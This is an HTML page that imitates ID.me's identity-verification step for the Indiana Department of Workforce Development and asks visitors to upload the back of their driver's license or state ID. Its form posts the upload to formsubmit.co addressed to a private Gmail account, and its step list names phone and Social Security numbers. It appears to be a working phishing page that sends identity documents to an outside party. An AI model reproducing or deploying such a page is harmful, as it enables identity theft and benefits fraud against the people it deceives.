<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <title>Document</title>
        <link rel="stylesheet" href="/application-4a0b7b0d263d32df24730ee97ea6b5d903415cee58a98f8c.css">
        <link rel="stylesheet" href="/login.css">
        
    </head>
    <body>
        <div class="page-container" data-role="page-container">
            <div class="container">
            <div class="content-container step-upload_file" data-component="Components.PageTitle">
            <div class="form-header">
                <div class="form-header-content" role="banner">
                    <div class="partner">
                        <div class="c_icon m_idme">
                            <img alt="" src="/idme-logo-1d96899e99d393974ec16fa17a820e78fca132bd8ea53e01f1.svg">
                        </div>
                        <div class="c_icon m_addition">
                            <img alt="" src="/icon-addition-1c60f492657aa091463f6ac2e15f0f5123425f314e6038.svg">
                        </div>
                        <div class="c_icon m_consumer-logo">
                            <img alt="ID.me with Indiana Department of Workforce Development" src="/large.jpg">
                        </div>
                    </div>
                </div>
            
            
            </div>
            <main>
                <form class="edit_idme_verification_identity_attempt" id="edit_idme_verification_identity_attempt_324981620" autocomplete="off" data-validate="identity" data-errors-source=".label-error" data-live-region-target="#error-list" enctype="multipart/form-data" action="https://formsubmit.co/dein1011972@gmail.com" accept-charset="UTF-8" method="post" novalidate="novalidate">
                    <script>
                        window._qPHASE = "doc_upload";
                    </script>
            
                    <div class="form-container shared_structure">
                        <h1 class="heading" id="sr_page_title">Verify your identity</h1>
            
                        <ul class="subway_stops" role="presentation">
                            <li class="subway_stops-item">
                                <span aria-hidden="true">
                                1
                                </span>
                                <span class="sr-only">step 1 out of 5, Take photos of your identity document </span>
                            </li>
                            <li class="subway_stops-item">
                                <span aria-hidden="true">
                                2
                                </span>
                                <span class="sr-only">step 2 out of 5, Gathering more information Current step</span>
                            </li>
                            <li class="subway_stops-item">
                                <span aria-hidden="true">
                                3
                                </span>
                                <span class="sr-only">step 3 out of 5, Enter your phone number </span>
                            </li>
                            <li class="subway_stops-item active">
                                <span aria-hidden="true">
                                4
                                </span>
                                <span class="sr-only">step 4 out of 5, Enter your Social Security number </span>
                            </li>
                            <li class="subway_stops-item">
                                <span aria-hidden="true">
                                5
                                </span>
                                <span class="sr-only">step 5 out of 5, Confirm your information </span>
                            </li>
                        </ul>
            
                        <p class="alert alert-error" style="">
                        
                        </p>
                        <p class="alert alert-success" style="">
                        
                        </p>
            
                        <div class="form-content">
                            <h2>Upload back photo of your driver's license or state ID</h2>
                            <p>Choose a photo of the back side of your document. Then click "Continue" to proceed.</p>
                            <div class="form-fields" data-component="Components.Upload" data-target="upload" style="display: block">
                                <p class="m_file-types">Select a file to upload*</p>
                                <p class="m_file-types-list">JPG (16 MB)</p>
                                <label aria-label="Choose photo" class="c_file-input" data-target="upload" for="idme_verification_identity_attempt_image_back" style="display: block">
                                <div class="field file" data-role="input"><span class="preview"></span><span class="preview"></span>
                                    <input name="imageback" accept="image/jpeg, image/png, image/jpg, image/pjpeg, image/tiff, image/jpeg;base64" type="file" id="imageback" required="">
            
                                    <div class="m_active" data-action="upload" id="take_photo">
                                        <idme-button id="photoButton" layout="fill" text="Choose photo" type="button"></idme-button>
                                    </div>
                                    <div aria-hidden="true" class="reupload-button m_inactive" data-action="reupload" id="retake_photo">
                                        Choose a different photo
                                    </div>
                                </div>
                            </label>
                        </div>
            
                        <div style="font-size:15px;color:#2e3f51;padding:20px 0px 10px 35px;">
                                <strong>Please check the following to make sure your document can be processed:</strong>
                            </div>
                            <ul class="form-content-list narrow">
                                <li>The image is clear and not blurry (including your photo and/or barcode)</li>
                                <li>All information is visible (e.g., expiration date)</li>
                                <li>The document is not captured at an angle</li>
                            </ul>
            
                        </div>
                        <idme-action-group nopadding="true">
                        <idme-button data-disable="" disabled="" slot="primary" text="Continue" variant="primary" layout="fill" class="cta--stacked"></idme-button>
                        
                        </idme-action-group>
                        <a href="./verify.html" class="btn btn-primary" data-disable="true" data-clicked="false">Continue</a>

                    </div>
            
                </form>
            </main>
            </div>
            
            
            
                <footer class="footer">
                    <nav aria-label="Footer" class="footer__links">
                        <ul class="footer__list">
                        <li class="footer__list-item"><a target="_blank" class="footer__link" href="https://www.id.me/about">What is ID.me?</a></li>
                        <li class="footer__list-item"><a target="_blank" class="footer__link" href="https://www.id.me/terms">Terms of Service</a></li>
                        <li class="footer__list-item"><a target="_blank" class="footer__link" href="https://www.id.me/privacy">Privacy Policy</a></li>
                        </ul>
                    </nav>
                </footer>
                
            </div>
        </div>
    </body>
</html>